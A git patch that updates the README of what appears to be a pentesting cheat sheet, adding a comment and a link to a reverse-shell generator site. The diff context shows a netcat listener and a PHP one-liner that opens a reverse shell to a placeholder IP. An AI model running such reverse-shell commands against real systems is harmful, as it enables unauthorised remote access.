From 6ad6d3d094173af3a3597f5c45702b1fbc13e023 Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Wed, 3 Aug 2022 19:11:46 -0400 Subject: [PATCH] Update README.md --- README.md | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 49ff89c..1ed6d11 100644 --- a/README.md +++ b/README.md @@ -416,9 +416,10 @@ sudo nc –lnvp {PORT} # {PORT}: Select the port used to listen ``` -
+# {IP ADDRESS}: IP Address of the client from step one (python server) + ## NC Execute - Server [STEP 2] ```bash @@ -448,12 +449,16 @@ php -r ‘$sock=fsockopen(“{IP ADDRESS}”,{PORT});exec(“/bin/sh -i <&3 >&3 # {IP ADDRESS}: IP Address of the client from step one (listener) # {PORT}: Port of the client from step one (listener) ``` +
+## Reverse Shell Generator + +
[https://www.revshells.com/](https://www.revshells.com/) - +
# Shell Upgrade